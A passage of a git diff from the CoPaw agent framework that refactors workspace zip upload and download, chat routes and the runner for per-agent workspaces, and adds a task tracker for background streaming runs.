reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) + # Return immediately (optimistic update) return ToolInfo( name=tool_config.name, enabled=tool_config.enabled, diff --git a/src/copaw/app/routers/workspace.py b/src/copaw/app/routers/workspace.py index e93f9e5b2..94bf7e0a9 100644 --- a/src/copaw/app/routers/workspace.py +++ b/src/copaw/app/routers/workspace.py @@ -11,10 +11,9 @@ from datetime import datetime, timezone from pathlib import Path -from fastapi import APIRouter, HTTPException, UploadFile, 
File +from fastapi import APIRouter, HTTPException, UploadFile, File, Request from fastapi.responses import StreamingResponse -from ...constant import WORKING_DIR router = APIRouter(prefix="/workspace", tags=["workspace"]) @@ -54,7 +53,7 @@ def _zip_directory(root: Path) -> io.BytesIO: # --------------------------------------------------------------------------- -def _validate_zip_data(data: bytes) -> None: +def _validate_zip_data(data: bytes, workspace_dir: Path) -> None: """Ensure *data* is a valid zip without path-traversal entries.""" if not zipfile.is_zipfile(io.BytesIO(data)): raise HTTPException( @@ -63,16 +62,16 @@ def _validate_zip_data(data: bytes) -> None: ) with zipfile.ZipFile(io.BytesIO(data)) as zf: for name in zf.namelist(): - resolved = (WORKING_DIR / name).resolve() - if not str(resolved).startswith(str(WORKING_DIR)): + resolved = (workspace_dir / name).resolve() + if not str(resolved).startswith(str(workspace_dir)): raise HTTPException( status_code=400, detail=f"Zip contains unsafe path: {name}", ) -def _extract_and_merge_zip(data: bytes) -> None: - """Extract zip data and merge into WORKING_DIR (blocking operation).""" +def _extract_and_merge_zip(data: bytes, workspace_dir: Path) -> None: + """Extract zip data and merge into workspace_dir (blocking operation).""" tmp_dir = None try: tmp_dir = Path(tempfile.mkdtemp(prefix="copaw_upload_")) @@ -84,10 +83,10 @@ def _extract_and_merge_zip(data: bytes) -> None: if len(top_entries) == 1 and top_entries[0].is_dir(): extract_root = top_entries[0] - WORKING_DIR.mkdir(parents=True, exist_ok=True) + workspace_dir.mkdir(parents=True, exist_ok=True) for item in extract_root.iterdir(): - dest = WORKING_DIR / item.name + dest = workspace_dir / item.name if item.is_file(): shutil.copy2(item, dest) else: @@ -99,10 +98,10 @@ def _extract_and_merge_zip(data: bytes) -> None: shutil.rmtree(tmp_dir, ignore_errors=True) -def _validate_and_extract_zip(data: bytes) -> None: +def _validate_and_extract_zip(data: bytes, 
workspace_dir: Path) -> None: """Validate and extract zip data (blocking operation).""" - _validate_zip_data(data) - _extract_and_merge_zip(data) + _validate_zip_data(data, workspace_dir) + _extract_and_merge_zip(data, workspace_dir) # --------------------------------------------------------------------------- @@ -114,28 +113,33 @@ def _validate_and_extract_zip(data: bytes) -> None: "/download", summary="Download workspace as zip", description=( - "Package the entire WORKING_DIR into a zip archive and stream it " - "back as a downloadable file." + "Package the entire agent workspace into a zip archive and stream " + "it back as a downloadable file." ), responses={ 200: { "content": {"application/zip": {}}, - "description": "Zip archive of WORKING_DIR", + "description": "Zip archive of agent workspace", }, }, ) -async def download_workspace(): - """Stream WORKING_DIR as a zip file.""" - if not WORKING_DIR.is_dir(): +async def download_workspace(request: Request): + """Stream agent workspace as a zip file.""" + from ..agent_context import get_agent_for_request + + agent = await get_agent_for_request(request) + workspace_dir = agent.workspace_dir + + if not workspace_dir.is_dir(): raise HTTPException( status_code=404, - detail=f"WORKING_DIR does not exist: {WORKING_DIR}", + detail=f"Workspace does not exist: {workspace_dir}", ) - buf = await asyncio.to_thread(_zip_directory, WORKING_DIR) + buf = await asyncio.to_thread(_zip_directory, workspace_dir) timestamp = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S") - filename = f"copaw_workspace_{timestamp}.zip" + filename = f"copaw_workspace_{agent.agent_id}_{timestamp}.zip" return StreamingResponse( buf, @@ -152,20 +156,24 @@ async def download_workspace(): summary="Upload zip and merge into workspace", description=( "Upload a zip archive. Paths present in the zip are merged into " - "WORKING_DIR (files overwritten, dirs merged). Paths not in the zip " - "are left unchanged (e.g. copaw.db, runtime dirs). 
Download packs " - "the entire WORKING_DIR; upload only overwrites/merges zip contents." + "agent workspace (files overwritten, dirs merged). Paths not in " + "the zip are left unchanged (e.g. copaw.db, runtime dirs). " + "Download packs the entire workspace; upload only " + "overwrites/merges zip contents." ), ) async def upload_workspace( + request: Request, file: UploadFile = File( ..., - description="Zip archive to merge into WORKING_DIR", + description="Zip archive to merge into agent workspace", ), ) -> dict: """ - Merge uploaded zip contents into WORKING_DIR (overwrite, do not clear). + Merge uploaded zip contents into agent workspace (overwrite, not clear). """ + from ..agent_context import get_agent_for_request + if file.content_type and file.content_type not in ( "application/zip", "application/x-zip-compressed", @@ -178,10 +186,12 @@ async def upload_workspace( ), ) + agent = await get_agent_for_request(request) + workspace_dir = agent.workspace_dir data = await file.read() try: - await asyncio.to_thread(_validate_and_extract_zip, data) + await asyncio.to_thread(_validate_and_extract_zip, data, workspace_dir) return {"success": True} except HTTPException: raise diff --git a/src/copaw/app/runner/api.py b/src/copaw/app/runner/api.py index 6862b7849..25761a9d5 100644 --- a/src/copaw/app/runner/api.py +++ b/src/copaw/app/runner/api.py @@ -18,46 +18,47 @@ router = APIRouter(prefix="/chats", tags=["chats"]) -def get_chat_manager(request: Request) -> ChatManager: - """Get the chat manager from app state. +async def get_workspace(request: Request): + """Get the workspace for the active agent.""" + from ..agent_context import get_agent_for_request + + return await get_agent_for_request(request) + + +async def get_chat_manager( + request: Request, +) -> ChatManager: + """Get the chat manager for the active agent. 
Args: request: FastAPI request object Returns: - ChatManager instance + ChatManager instance for the specified agent Raises: HTTPException: If manager is not initialized """ - mgr = getattr(request.app.state, "chat_manager", None) - if mgr is None: - raise HTTPException( - status_code=503, - detail="Chat manager not initialized", - ) - return mgr + workspace = await get_workspace(request) + return workspace.chat_manager -def get_session(request: Request) -> SafeJSONSession: - """Get the session from app state. +async def get_session( + request: Request, +) -> SafeJSONSession: + """Get the session for the active agent. Args: request: FastAPI request object Returns: - SafeJSONSession instance + SafeJSONSession instance for the specified agent Raises: HTTPException: If session is not initialized """ - runner = getattr(request.app.state, "runner", None) - if runner is None: - raise HTTPException( - status_code=503, - detail="Session not initialized", - ) - return runner.session + workspace = await get_workspace(request) + return workspace.runner.session @router.get("", response_model=list[ChatSpec]) @@ -65,6 +66,7 @@ async def list_chats( user_id: Optional[str] = Query(None, description="Filter by user ID"), channel: Optional[str] = Query(None, description="Filter by channel"), mgr: ChatManager = Depends(get_chat_manager), + workspace=Depends(get_workspace), ): """List all chats with optional filters. 
@@ -73,7 +75,13 @@ async def list_chats( channel: Optional channel name to filter chats mgr: Chat manager dependency """ - return await mgr.list_chats(user_id=user_id, channel=channel) + chats = await mgr.list_chats(user_id=user_id, channel=channel) + tracker = workspace.task_tracker + result = [] + for spec in chats: + status = await tracker.get_status(spec.id) + result.append(spec.model_copy(update={"status": status})) + return result @router.post("", response_model=ChatSpec) @@ -127,6 +135,7 @@ async def get_chat( chat_id: str, mgr: ChatManager = Depends(get_chat_manager), session: SafeJSONSession = Depends(get_session), + workspace=Depends(get_workspace), ): """Get detailed information about a specific chat by UUID. @@ -136,7 +145,7 @@ async def get_chat( session: SafeJSONSession dependency Returns: - ChatHistory with messages + ChatHistory with messages and status (idle/running) Raises: HTTPException: If chat not found (404) @@ -152,15 +161,16 @@ async def get_chat( chat_spec.session_id, chat_spec.user_id, ) + status = await workspace.task_tracker.get_status(chat_id) if not state: - return ChatHistory(messages=[]) + return ChatHistory(messages=[], status=status) memories = state.get("agent", {}).get("memory", []) memory = InMemoryMemory() memory.load_state_dict(memories) memories = await memory.get_memory() messages = agentscope_msg_to_message(memories) - return ChatHistory(messages=messages) + return ChatHistory(messages=messages, status=status) @router.put("/{chat_id}", response_model=ChatSpec) diff --git a/src/copaw/app/runner/command_dispatch.py b/src/copaw/app/runner/command_dispatch.py index 585dde2ef..e05e86071 100644 --- a/src/copaw/app/runner/command_dispatch.py +++ b/src/copaw/app/runner/command_dispatch.py @@ -7,9 +7,9 @@ import logging from typing import AsyncIterator +from typing import TYPE_CHECKING from agentscope.message import Msg, TextBlock -from reme.memory.file_based.reme_in_memory_memory import ReMeInMemoryMemory from .daemon_commands 
import ( DaemonContext, @@ -17,11 +17,13 @@ parse_daemon_query, ) from ...agents.command_handler import CommandHandler -from ...agents.utils.token_counting import _get_token_counter -from ...config import load_config +from ...config.config import load_agent_config logger = logging.getLogger(__name__) +if TYPE_CHECKING: + from .runner import AgentRunner + def _get_last_user_text(msgs) -> str | None: """Extract last user message text from msgs (runtime message list).""" @@ -61,7 +63,7 @@ def _is_command(query: str | None) -> bool: async def run_command_path( request, msgs, - runner, + runner: AgentRunner, ) -> AsyncIterator[tuple]: """Run command path and yield (msg, last) for each response. @@ -106,8 +108,10 @@ async def run_command_path( ], ) yield hint, True + + agent_id = runner.agent_id context = DaemonContext( - load_config_fn=load_config, + load_config_fn=lambda: load_agent_config(agent_id), memory_manager=runner.memory_manager, restart_callback=restart_cb, session_id=session_id, @@ -118,19 +122,21 @@ async def run_command_path( return # Conversation path: lightweight memory + CommandHandler - memory = ReMeInMemoryMemory(token_counter=_get_token_counter()) + memory = runner.memory_manager.get_in_memory_memory() session_state = await runner.session.get_session_state_dict( session_id=session_id, user_id=user_id, ) - memory_state = session_state.get("agent", {}).get("memory") - memory.load_state_dict(memory_state) + memory_state = session_state.get("agent", {}).get("memory", {}) + memory.load_state_dict(memory_state, strict=False) + agent_config = load_agent_config(runner.agent_id) conv_handler = CommandHandler( agent_name="Friday", memory=memory, memory_manager=runner.memory_manager, enable_memory_manager=runner.memory_manager is not None, + agent_config=agent_config, ) try: response_msg = await conv_handler.handle_conversation_command(query) diff --git a/src/copaw/app/runner/daemon_commands.py b/src/copaw/app/runner/daemon_commands.py index a27406653..04ea3ae90 
100644 --- a/src/copaw/app/runner/daemon_commands.py +++ b/src/copaw/app/runner/daemon_commands.py @@ -11,13 +11,16 @@ import logging from dataclasses import dataclass from pathlib import Path -from typing import Any, Awaitable, Callable, Optional +from typing import Any, Awaitable, Callable, Optional, TYPE_CHECKING from agentscope.message import Msg, TextBlock from ...constant import WORKING_DIR from ...config import load_config +if TYPE_CHECKING: + from ...config.config import AgentProfileConfig + RestartCallback = Callable[[], Awaitable[None]] logger = logging.getLogger(__name__) @@ -96,7 +99,12 @@ def run_daemon_status(context: DaemonContext) -> str: try: cfg = context.load_config_fn() parts.append("- Config loaded: yes") - if getattr(cfg, "agents", None) and getattr( + # Support both AgentProfileConfig (has 'running' directly) + # and Config (has 'agents.running') + if hasattr(cfg, "running"): + max_in = getattr(cfg.running, "max_input_length", "N/A") + parts.append(f"- Max input length: {max_in}") + elif getattr(cfg, "agents", None) and getattr( cfg.agents, "running", None, diff --git a/src/copaw/app/runner/manager.py b/src/copaw/app/runner/manager.py index 19b59e408..f7a51c9ca 100644 --- a/src/copaw/app/runner/manager.py +++ b/src/copaw/app/runner/manager.py @@ -35,6 +35,9 @@ def __init__( """ self._repo = repo self._lock = asyncio.Lock() + logger.info( + f"ChatManager created with repo path: {repo.path}", + ) # ----- Read Operations ----- @@ -53,6 +56,10 @@ async def list_chats( List of chat specifications """ async with self._lock: + logger.debug( + f"list_chats: repo path={self._repo.path}, " + f"filters: user_id={user_id}, channel={channel}", + ) return await self._repo.filter_chats( user_id=user_id, channel=channel, @@ -92,21 +99,34 @@ async def get_or_create_chat( """ async with self._lock: # Try to find existing by session_id + logger.debug( + f"get_or_create_chat: Searching for existing chat: " + f"session_id={session_id}, user_id={user_id}, " + 
f"channel={channel}", + ) existing = await self._repo.get_chat_by_id( session_id, user_id, channel, ) if existing: + logger.debug( + f"get_or_create_chat: Found existing chat: {existing.id}", + ) return existing # Create new + logger.debug( + f"get_or_create_chat: Creating new chat for " + f"session_id={session_id}", + ) spec = ChatSpec( session_id=session_id, user_id=user_id, channel=channel, name=name, ) + logger.debug(f"get_or_create_chat: created spec={spec.id}") # Call internal create without lock (already locked) await self._repo.upsert_chat(spec) logger.debug( diff --git a/src/copaw/app/runner/models.py b/src/copaw/app/runner/models.py index ac39e3a0a..d00105fd7 100644 --- a/src/copaw/app/runner/models.py +++ b/src/copaw/app/runner/models.py @@ -41,12 +41,21 @@ class ChatSpec(BaseModel): default_factory=dict, description="Additional metadata", ) + status: str = Field( + default="idle", + description="Conversation status: idle or running", + exclude=True, + ) class ChatHistory(BaseModel): """Complete chat view with spec and state.""" messages: list[Message] = Field(default_factory=list) + status: str = Field( + default="idle", + description="Conversation status: idle or running", + ) class ChatsFile(BaseModel): diff --git a/src/copaw/app/runner/query_error_dump.py b/src/copaw/app/runner/query_error_dump.py index ffd11d135..37af112e3 100644 --- a/src/copaw/app/runner/query_error_dump.py +++ b/src/copaw/app/runner/query_error_dump.py @@ -7,7 +7,7 @@ import os import tempfile import traceback -from datetime import datetime +from datetime import datetime, timezone from typing import Any from ..channels.schema import DEFAULT_CHANNEL @@ -80,7 +80,9 @@ def write_query_error_dump( "request_info": request_info, "request": request_full, "agent_state": agent_state, - "ts_utc": datetime.utcnow().isoformat() + "Z", + "ts_utc": datetime.now(timezone.utc).strftime( + "%Y-%m-%dT%H:%M:%SZ", + ), } fd, path = tempfile.mkstemp( prefix="copaw_query_error_", diff --git 
a/src/copaw/app/runner/repo/base.py b/src/copaw/app/runner/repo/base.py index a0daa0afd..2ade1ffc8 100644 --- a/src/copaw/app/runner/repo/base.py +++ b/src/copaw/app/runner/repo/base.py @@ -60,14 +60,28 @@ async def get_chat_by_id( Returns: ChatSpec or None if not found """ + import logging + + logger = logging.getLogger(__name__) + cf = await self.load() + + logger.debug( + f"get_chat_by_id: Searching in {len(cf.chats)} chats for " + f"session_id={session_id}, user_id={user_id}, " + f"channel={channel}", + ) + for chat in cf.chats: if ( chat.session_id == session_id and chat.user_id == user_id and chat.channel == channel ): + logger.debug(f"get_chat_by_id: Found match: {chat.id}") return chat + + logger.debug("get_chat_by_id: No match found") return None async def upsert_chat(self, spec: ChatSpec) -> None: diff --git a/src/copaw/app/runner/runner.py b/src/copaw/app/runner/runner.py index 7db622279..9cbe8cf76 100644 --- a/src/copaw/app/runner/runner.py +++ b/src/copaw/app/runner/runner.py @@ -7,6 +7,7 @@ import logging import time from pathlib import Path +from typing import TYPE_CHECKING from agentscope.message import Msg, TextBlock from agentscope.pipeline import stream_printing_messages @@ -23,23 +24,33 @@ from .session import SafeJSONSession from .utils import build_env_context from ..channels.schema import DEFAULT_CHANNEL -from ...agents.memory import MemoryManager from ...agents.react_agent import CoPawAgent from ...security.tool_guard.models import TOOL_GUARD_DENIED_MARK -from ...config import load_config +from ...config import load_config, save_config from ...constant import ( TOOL_GUARD_APPROVAL_TIMEOUT_SECONDS, WORKING_DIR, ) from ...security.tool_guard.approval import ApprovalDecision +if TYPE_CHECKING: + from ...agents.memory import MemoryManager + logger = logging.getLogger(__name__) class AgentRunner(Runner): - def __init__(self) -> None: + def __init__( + self, + agent_id: str = "default", + workspace_dir: Path | None = None, + ) -> None: 
super().__init__() self.framework_type = "agentscope" + self.agent_id = agent_id # Store agent_id for config loading + self.workspace_dir = ( + workspace_dir # Store workspace_dir for prompt building + ) self._chat_manager = None # Store chat_manager reference self._mcp_manager = None # MCP client manager for hot-reload self.memory_manager: MemoryManager | None = None @@ -149,6 +160,10 @@ async def query_handler( """ Handle agent query. """ + logger.debug( + f"AgentRunner.query_handler called: agent_id={self.agent_id}, " + f"msgs={msgs}, request={request}", + ) query = _get_last_user_text(msgs) session_id = getattr(request, "session_id", "") or "" @@ -172,9 +187,22 @@ async def query_handler( yield msg, last return + logger.debug( + f"AgentRunner.stream_query: request={request}, " + f"agent_id={self.agent_id}", + ) + + # Set agent context for model creation + from ..agent_context import set_current_agent_id + + set_current_agent_id(self.agent_id) + agent = None chat = None session_state_loaded = False + generated_messages = [] + config = None + knowledge_manager = None try: session_id = request.session_id user_id = request.user_id @@ -199,7 +227,11 @@ async def query_handler( session_id=session_id, user_id=user_id, channel=channel, - working_dir=str(WORKING_DIR), + working_dir=( + str(self.workspace_dir) + if self.workspace_dir + else str(WORKING_DIR) + ), ) # Get MCP clients from manager (hot-reloadable) @@ -208,10 +240,38 @@ async def query_handler( mcp_clients = await self._mcp_manager.get_clients() config = load_config() + running = config.agents.running + + try: + should_collect_user_assets = bool( + getattr(running, "knowledge_auto_collect_chat_files", False) + or getattr(running, "knowledge_auto_collect_chat_urls", True) + ) + if should_collect_user_assets: + from ...knowledge import KnowledgeManager + + knowledge_manager = KnowledgeManager(WORKING_DIR) + user_stage_result = knowledge_manager.auto_collect_user_message_assets( + config.knowledge, + 
session_id=session_id, + user_id=user_id, + request_messages=list(msgs or []), + running_config=running, + ) + if user_stage_result.get("changed"): + save_config(config) + except Exception: + logger.exception( + "Failed to auto-collect user assets for session %s", + session_id, + ) + max_iters = config.agents.running.max_iters max_input_length = config.agents.running.max_input_length + effective_msgs = list(msgs or []) agent = CoPawAgent( + agent_config=agent_config, env_context=env_context, mcp_clients=mcp_clients, memory_manager=self.memory_manager, @@ -219,9 +279,9 @@ async def query_handler( "session_id": session_id, "user_id": user_id, "channel": channel, + "agent_id": self.agent_id, }, - max_iters=max_iters, - max_input_length=max_input_length, + workspace_dir=self.workspace_dir, ) await agent.register_mcp_clients() agent.set_console_output_enabled(enabled=False) @@ -238,13 +298,31 @@ async def query_handler( else: name = "Media Message" + logger.debug( + f"DEBUG chat_manager status: " + f"_chat_manager={self._chat_manager}, " + f"is_none={self._chat_manager is None}, " + f"agent_id={self.agent_id}", + ) + if self._chat_manager is not None: + logger.debug( + f"Runner: Calling get_or_create_chat for " + f"session_id={session_id}, user_id={user_id}, " + f"channel={channel}, name={name}", + ) chat = await self._chat_manager.get_or_create_chat( session_id, user_id, channel, name=name, ) + logger.debug(f"Runner: Got chat: {chat.id}") + else: + logger.warning( + f"ChatManager is None! 
Cannot auto-register chat for " + f"session_id={session_id}", + ) try: await self.session.load_session_state( @@ -267,8 +345,9 @@ async def query_handler( async for msg, last in stream_printing_messages( agents=[agent], - coroutine_task=agent(msgs), + coroutine_task=agent(effective_msgs), ): + generated_messages.append(msg) yield msg, last except asyncio.CancelledError as exc: @@ -305,6 +384,40 @@ async def query_handler( agent=agent, ) + if config is not None and session_id: + try: + running = config.agents.running + should_auto_collect = bool( + getattr(running, "knowledge_auto_collect_chat_files", False) + or getattr(running, "knowledge_auto_collect_long_text", False) + ) + + if should_auto_collect: + from ...knowledge import KnowledgeManager + + manager = knowledge_manager or KnowledgeManager(WORKING_DIR) + + should_auto_collect_text = bool( + getattr(running, "knowledge_auto_collect_long_text", False), + ) + + if should_auto_collect_text: + text_result = manager.auto_collect_turn_text_pair( + config.knowledge, + running_config=running, + session_id=session_id, + user_id=user_id, + request_messages=list(msgs or []), + response_messages=generated_messages, + ) + if text_result.get("changed"): + save_config(config) + except Exception: + logger.exception( + "Failed to auto-collect chat knowledge for session %s", + session_id, + ) + if self._chat_manager is not None and chat is not None: await self._chat_manager.update_chat(chat) @@ -423,7 +536,8 @@ async def init_handler(self, *args, **kwargs): Init handler. 
""" # Load environment variables from .env file - env_path = Path(__file__).resolve().parents[4] / ".env" + # env_path = Path(__file__).resolve().parents[4] / ".env" + env_path = Path("./") / ".env" if env_path.exists(): load_dotenv(env_path) logger.debug(f"Loaded environment variables from {env_path}") @@ -433,24 +547,13 @@ async def init_handler(self, *args, **kwargs): "using existing environment variables", ) - session_dir = str(WORKING_DIR / "sessions") + session_dir = str( + (self.workspace_dir if self.workspace_dir else WORKING_DIR) + / "sessions", + ) self.session = SafeJSONSession(save_dir=session_dir) - try: - if self.memory_manager is None: - self.memory_manager = MemoryManager( - working_dir=str(WORKING_DIR), - ) - await self.memory_manager.start() - except Exception as e: - logger.exception(f"MemoryManager start failed: {e}") - async def shutdown_handler(self, *args, **kwargs): """ Shutdown handler. """ - try: - if self.memory_manager is not None: - await self.memory_manager.close() - except Exception as e: - logger.warning(f"MemoryManager stop failed: {e}") diff --git a/src/copaw/app/runner/task_tracker.py b/src/copaw/app/runner/task_tracker.py new file mode 100644 index 000000000..140bcd2f5 --- /dev/null +++ b/src/copaw/app/runner/task_tracker.py @@ -0,0 +1,176 @@ +# -*- coding: utf-8 -*- +"""Task tracker for background runs: streaming, reconnect, multi-subscriber. + +run_key is ChatSpec.id (chat_id). Per run: task, queues, event buffer. +Reconnects get buffer replay + new events. Cleanup when task completes. 
+""" +from __future__ import annotations + +import asyncio +import json +import logging +import weakref +from dataclasses import dataclass, field +from typing import Any, AsyncGenerator, Callable, Coroutine + +logger = logging.getLogger(__name__) + +_QUEUE_MAX_SIZE = 4096 +_SENTINEL = None + + +@dataclass +class _RunState: + """Per-run state (task, queues, buffer), guarded by tracker lock.""" + + task: asyncio.Future + queues: list[asyncio.Queue] = field(default_factory=list) + buffer: list[str] = field(default_factory=list) + + +class TaskTracker: + """Per-workspace tracker: run_key -> RunState. + + All mutations to _runs under _lock. Producer broadcasts under lock. + Dead queues pruned when full. + """ + + def __init__(self) -> None: + self._lock = asyncio.Lock() + self._runs: dict[str, _RunState] = {} + + @property + def lock(self) -> asyncio.Lock: + return self._lock + + async def get_status(self, run_key: str) -> str: + """Return ``'idle'`` or ``'running'``.""" + async with self._lock: + state = self._runs.get(run_key) + if state is None or state.task.done(): + return "idle" + return "running" + + async def attach(self, run_key: str) -> asyncio.Queue | None: + """Attach to an existing run. + + Returns a new queue pre-filled with the event buffer, or ``None`` + if no run is active for *run_key*. + """ + async with self._lock: + state = self._runs.get(run_key) + if state is None or state.task.done(): + return None + q: asyncio.Queue = asyncio.Queue(maxsize=_QUEUE_MAX_SIZE) + for sse in state.buffer: + q.put_nowait(sse) + state.queues.append(q) + return q + + async def request_stop(self, run_key: str) -> bool: + """Cancel the run. 
Returns ``True`` if it was running.""" + async with self._lock: + state = self._runs.get(run_key) + if state is None or state.task.done(): + return False + state.task.cancel() + return True + + async def attach_or_start( + self, + run_key: str, + payload: Any, + stream_fn: Callable[..., Coroutine], + ) -> tuple[asyncio.Queue, bool]: + """Attach to an existing run or start a new one. + + Returns ``(queue, is_new_run)``. + """ + async with self._lock: + state = self._runs.get(run_key) + if state is not None and not state.task.done(): + q: asyncio.Queue = asyncio.Queue(maxsize=_QUEUE_MAX_SIZE) + for sse in state.buffer: + q.put_nowait(sse) + state.queues.append(q) + return q, False + + my_queue: asyncio.Queue = asyncio.Queue(maxsize=_QUEUE_MAX_SIZE) + run = _RunState( + task=asyncio.Future(), # placeholder, replaced below + queues=[my_queue], + buffer=[], + ) + self._runs[run_key] = run + + tracker_ref = weakref.ref(self) + + async def _producer() -> None: + try: + async for sse in stream_fn(payload): + tracker = tracker_ref() + if tracker is None: + return + async with tracker.lock: + run.buffer.append(sse) + alive: list[asyncio.Queue] = [] + for q in run.queues: + try: + q.put_nowait(sse) + alive.append(q) + except asyncio.QueueFull: + logger.warning( + "dropping subscriber queue (full) " + "run_key=%s", + run_key, + ) + # Prune dead queues (full = client not reading) + run.queues = alive + except asyncio.CancelledError: + logger.debug("run cancelled run_key=%s", run_key) + except Exception: + logger.exception("run error run_key=%s", run_key) + err_sse = ( + "data: " + f"{json.dumps({'error': 'internal server error'})}\n\n" + ) + tracker = tracker_ref() + if tracker is not None: + async with tracker.lock: + run.buffer.append(err_sse) + for q in run.queues: + try: + q.put_nowait(err_sse) + except asyncio.QueueFull: + pass + finally: + tracker = tracker_ref() + if tracker is not None: + async with tracker.lock: + for q in run.queues: + try: + q.put_nowait(_SENTINEL) + 
except asyncio.QueueFull: + pass + # pylint: disable=protected-access + tracker._runs.pop( + run_key, + None, + ) + + run.task = asyncio.create_task(_producer()) + return my_queue, True + + @staticmethod + async def stream_from_queue( + queue: asyncio.Queue, + ) -> AsyncGenerator[str, None]: + """Yield SSE strings from *queue* until the sentinel ``None``.""" + while True: + try: + event = await queue.get() + if event is _SENTINEL: + break + yield event + except asyncio.CancelledError: + break diff --git a/src/copaw/app/runner/utils.py b/src/copaw/app/runner/utils.py index d141c84be..2455aee93 100644 --- a/src/copaw/app/runner/utils.py +++ b/src/copaw/app/runner/utils.py @@ -1,8 +1,12 @@ # -*- coding: utf-8 -*- import json +import logging +import platform from datetime import datetime, timezone from typing import Optional, Union, List from urllib.parse import urlparse +from zoneinfo import ZoneInfo, ZoneInfoNotFoundError + from agentscope.message import Msg from agentscope_runtime.engine.schemas.agent_schemas import ( Message, @@ -12,6 +16,10 @@ ) from agentscope_runtime.engine.helpers.agent_api_builder import ResponseBuilder +from ...config import load_config + +logger = logging.getLogger(__name__) + def build_env_context( session_id: Optional[str] = None, @@ -33,27 +41,42 @@ def build_env_context( Formatted environment context string """ parts = [] - now_utc = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC (%A)") - parts.append(f"- 当前 UTC 时间: {now_utc}") + user_tz = load_config().user_timezone or "UTC" + try: + now = datetime.now(ZoneInfo(user_tz)) + except (ZoneInfoNotFoundError, KeyError): + logger.warning("Invalid timezone %r, falling back to UTC", user_tz) + now = datetime.now(timezone.utc) + user_tz = "UTC" + if session_id is not None: - parts.append(f"- 当前的session_id: {session_id}") + parts.append(f"- Session ID: {session_id}") if user_id is not None: - parts.append(f"- 当前的user_id: {user_id}") + parts.append(f"- User ID: {user_id}") if channel is 
not None: - parts.append(f"- 当前的channel: {channel}") + parts.append(f"- Channel: {channel}") + + parts.append( + f"- OS: {platform.system()} {platform.release()} " + f"({platform.machine()})", + ) if working_dir is not None: - parts.append(f"- 工作目录: {working_dir}") + parts.append(f"- Working directory: {working_dir}") + parts.append( + f"- Current time: {now.strftime('%Y-%m-%d %H:%M:%S')} " + f"{user_tz} ({now.strftime('%A')})", + ) if add_hint: parts.append( - "- 重要提示:\n" - " 1. 完成任务时,优先考虑使用 skills" - "(例如定时任务,优先使用 cron skill)。" - "对于不清楚的 skills,请先查阅相关对应文档。\n" - " 2. 使用 write_file 写文件时,如果担心覆盖原有内容," - "可以先用 read_file 查看文件内容," - "再使用 edit_file 工具进行局部内容更新或追加内容。", + "- Important:\n" + " 1. Prefer using skills when completing tasks " + "(e.g. use the cron skill for scheduled tasks). " + "Consult the relevant skill documentation if unsure.\n" + " 2. When using write_file, if you want to avoid overwriting " + "existing content, use read_file first to inspect the file, " + "then use edit_file for partial updates or appending.", ) return ( diff --git a/src/copaw/app/workspace.py b/src/copaw/app/workspace.py new file mode 100644 index 000000000..832763f24 --- /dev/null +++ b/src/copaw/app/workspace.py @@ -0,0 +1,447 @@ +# -*- coding: utf-8 -*- +"""Workspace: Encapsulates a complete independent agent runtime. + +Each Workspace represents a standalone agent workspace with its own: +- Runner (request processing) +- ChannelManager (communication channels) +- MemoryManager (conversation memory) +- MCPClientManager (MCP tool clients) +- CronManager (scheduled tasks) + +All existing single-agent components are reused without modification. 
+""" +import asyncio +import logging +from pathlib import Path +from typing import Optional, TYPE_CHECKING + +from .runner import AgentRunner +from .runner.task_tracker import TaskTracker +from .channels.utils import make_process_from_runner +from .mcp import MCPClientManager +from .crons.manager import CronManager +from .crons.repo.json_repo import JsonJobRepository +from ..agents.memory import MemoryManager +from ..config.config import load_agent_config + +if TYPE_CHECKING: + from .channels.base import BaseChannel + +logger = logging.getLogger(__name__) + + +class Workspace: + """Single agent workspace with complete runtime components. + + Each Workspace is an independent agent instance with its own: + - Runner: Processes agent requests + - ChannelManager: Manages communication channels + - MemoryManager: Manages conversation memory + - MCPClientManager: Manages MCP tool clients + - CronManager: Manages scheduled tasks + + All components use existing single-agent code without modification. + """ + + def __init__(self, agent_id: str, workspace_dir: str): + """Initialize agent instance. 
+ + Args: + agent_id: Unique agent identifier + workspace_dir: Path to agent's workspace directory + """ + self.agent_id = agent_id + self.workspace_dir = Path(workspace_dir).expanduser() + self.workspace_dir.mkdir(parents=True, exist_ok=True) + + # All components are None until start() is called (lazy loading) + self._runner: Optional[AgentRunner] = None + self._channel_manager: Optional["BaseChannel"] = None + self._memory_manager: Optional[MemoryManager] = None + self._mcp_manager: Optional[MCPClientManager] = None + self._cron_manager: Optional["CronManager"] = None + self._chat_manager = None + self._config = None + self._config_watcher = None + self._mcp_config_watcher = None + self._task_tracker = TaskTracker() + self._started = False + + logger.debug( + f"Created Workspace: {agent_id} at {self.workspace_dir}", + ) + + @property + def runner(self) -> Optional[AgentRunner]: + """Get runner instance.""" + return self._runner + + @property + def channel_manager(self) -> Optional["BaseChannel"]: + """Get channel manager instance.""" + return self._channel_manager + + @property + def memory_manager(self) -> Optional[MemoryManager]: + """Get memory manager instance.""" + return self._memory_manager + + @property + def mcp_manager(self) -> Optional[MCPClientManager]: + """Get MCP client manager instance.""" + return self._mcp_manager + + @property + def cron_manager(self) -> Optional["CronManager"]: + """Get cron manager instance.""" + return self._cron_manager + + @property + def chat_manager(self): + """Get chat manager instance.""" + return self._chat_manager + + @property + def task_tracker(self) -> TaskTracker: + """Get task tracker for background chat and reconnect.""" + return self._task_tracker + + @property + def config(self): + """Get agent configuration.""" + if self._config is None: + self._config = load_agent_config(self.agent_id) + return self._config + + async def start(self): # pylint: disable=too-many-statements + """Start workspace and initialize 
